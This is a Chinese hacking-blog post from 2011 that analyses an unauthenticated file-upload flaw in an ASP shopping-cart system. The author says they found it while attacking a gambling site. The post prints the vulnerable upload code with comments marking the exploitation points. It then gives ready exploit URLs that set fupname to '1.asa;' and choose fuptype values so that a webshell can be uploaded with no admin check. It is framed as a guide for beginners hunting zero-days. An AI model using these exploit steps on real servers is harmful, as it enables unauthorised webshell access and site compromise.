分享网络商城购物系统v3.0全功能版 上传漏洞

2011, July 2, 9:07 AM. 漏洞分析
Submitted by admin

首发地址:www.3est.com
Author:村长
BLOG:www.baidu.com

拿赌博站时,遇到的充值地址在这个程序的站点上,所以就去下载了份,略过看注入点,直接看上传地方.


文件u_sc1.asp源码:

  1. <!--#include file="../include/yiwebchina.asp"-->
  2. <%
  3. session("fuptype")=request("fuptype")            '此处先接受fuptype,存入session("fuptype")   ,下一个文件需要利用       
  4. session("fupname")=request("fupname")            '此处先接受fupname,存入session("fupname")   ,下一个文件需要利用
  5. session("frmname")=request("frmname")            
  6.  
  7. /*省略代码*/
  8.  
  9. <form name="form1" method="post" action="u_sc1save.asp" enctype="multipart/form-data">
  10. <b>请选择要上传的文件:</b><br>
  11. <input type=file name="file1">
  12. <input type=submit name="submit" value="上传"><br><br>
  13. ·点击“上传”后,请耐心等待(不要重复点击“上传”),上传时间视文件大小和网络状况而定<br>
  14. ·为节省空间,如果是图片文件,请尽量优化,建议单个文件不要超过50KB。<br>
  15. ·传送大文件时,可能导致服务器变慢或者不稳定。建议使用FTP上传大文件。
  16. </form>
复制代码

文件u_sc1save.asp源码

  1. <!--#include file="../include/yiwebchina.asp"-->
  2. <html>
  3. <head>
  4. <title>文件上传</title>
  5. <meta name="Description" Content="">
  6. <LINK href="../images/css.css" type=text/css rel=stylesheet>
  7. <LINK href="../list/newhead.css" type=text/css rel=stylesheet>
  8. <meta http-equiv="Content-Type" content="text/html; charset=gb2312"></head>
  9. <body bgcolor="#D9EAFC"><table align="left"><tr><td>
  10. <%
  11. fuptype=session("fuptype")                '利用点1
  12. fupname=session("fupname")                '利用点2
  13. frmname=session("frmname")               
  14. if fuptype="" or fupname="" or frmname="" then
  15. response.write "<script language='javascript'>"
  16. response.write "alert('出现错误,请重新上传!');"
  17. response.write "location.href='javascript:history.go(-1)';"
  18. response.write "</script>"
  19. response.end
  20. end if
  21. %>
  22. <!--#include FILE="upload_5xsoft.inc"-->
  23. <%
  24. set upload=new upload_5xsoft
  25. set file=upload.file("file1")
  26. if file.fileSize>0 then
  27. filename=fupname+"."                   '此处属于利用点2,直接把URL里的fupname值改为1.asa;,原因很多人懂滴
  28. filenameend=file.filename
  29. filenameend=split(filenameend,".")
  30. n=UBound(filenameend)
  31. filename=filename&filenameend(n)
  32. if fuptype<>"db" then
  33. if file.fileSize>200000 then
  34. response.write "<script language='javascript'>"
  35. response.write "alert('您上传的文件太大,上传不成功,单个文件最大不能超过200K!');"
  36. response.write "location.href='javascript:history.go(-1)';"
  37. response.write "</script>"
  38. response.end
  39. end if
  40. end if
  41. if fuptype="adv" or fuptype="pic" then     '问题也在这里出现了,当fuptype=adv或者fuptype=pic时才判断后缀
  42. if LCase(filenameend(n))<>"gif" and LCase(filenameend(n))<>"jpg" and LCase(filenameend(n))<>"swf" and LCase(filenameend(n))<>"htm" then
  43. response.write "<script language='javascript'>"
  44. response.write "alert('不允许上传您选择的文件格式,请检查后重新上传!');"
  45. response.write "location.href='javascript:history.go(-1)';"
  46. response.write "</script>"
  47. response.end
  48. end if
  49. end if
  50. if fuptype="adv" then            '此处利用点1,接下来是判断fuptype值了,ADV和PIC不能利用,乱填的话,上传后不会返回路径,所以可以利用的只有pic1,link,db了随便选择一个就行了
  51. savepath="../images/adv/"&filename
  52. elseif fuptype="pic" then
  53. savepath="../pic/digi/"&filename
  54. elseif fuptype="pic1" then
  55. savepath="../pic/digi1/"&filename
  56. elseif fuptype="link" then
  57. savepath="../images/links/"&filename
  58. elseif fuptype="db" then
  59. savepath="./"&filename
  60. end if
  61. file.saveAs Server.mappath(savepath)
  62. response.write "文件上传成功!上传文件的物理路径为:"
  63. response.write "<font color=red>"&Server.mappath(savepath)&"</font><br><br>"
  64. response.write "<a href='"&savepath&"'  target='_blank'>点击预览上传的文件</a>"
  65. response.write "<br><br><INPUT onclick='javascript:window.close();' type=submit value='上传完成'>"
  66. %>
复制代码

此文件所涉及的3个文件yiwebchina.asp,buyok.asp,functions.asp都米有验证ADMIN,所以直接利用吧

漏洞利用1:

http://www.baidu.com/admin/u_sc1 ... c&fupname=1.asa;&frmname=youpic   (上传SHELL的图片格式)

大小: 31.68 K
尺寸: 500 x 139
浏览: 53 次
点击打开新窗口浏览全图大小: 17.24 K
尺寸: 500 x 120
浏览: 41 次
点击打开新窗口浏览全图

漏洞利用2:
http://www.baidu.com/admin/u_sc1 ... &frmname=youpic    (随便上传)
大小: 31.33 K
尺寸: 500 x 133
浏览: 45 次
点击打开新窗口浏览全图大小: 16.5 K
尺寸: 500 x 135
浏览: 37 次
点击打开新窗口浏览全图

http://www.baidu.com/admin/u_sc1 ... &frmname=youpic     (随便上传)

http://www.baidu.com/admin/u_sc1 ... &frmname=youpic        (随便上传)


都注意SHELL文件不要超过限制200K(除开第四条DB上传外)


原理也很简单,也是给想学习自己找ODAY的菜菜详细的分析,呵呵

Tags: 上传

« 上一篇 | 下一篇 »

只显示10条记录相关文章
upfile 又一奇迹般的突破 (浏览: 8327, 评论: 0)
无忧购物系统ASP通用版 V2010.9.17 ---- 上传漏洞 (浏览: 10157, 评论: 0)
无忧购物系统ASP时尚版上传漏洞 (浏览: 10086, 评论: 0)
深度学习asp整站系统oday (浏览: 8663, 评论: 0)
微尔文章系统v1.51 (修正版)上传漏洞 (浏览: 10680, 评论: 0)
Es_Cms上传漏洞利用 (浏览: 9474, 评论: 0)
良精微博系统上传漏洞 (浏览: 12714, 评论: 0)
尘月网络企业网站管理系统2010生成HTML专业版之上传漏洞 (浏览: 11701, 评论: 0)
一个上传文件的分析笔记 (浏览: 10562, 评论: 0)
上传漏洞hidden to text 突破手记 (浏览: 11180, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):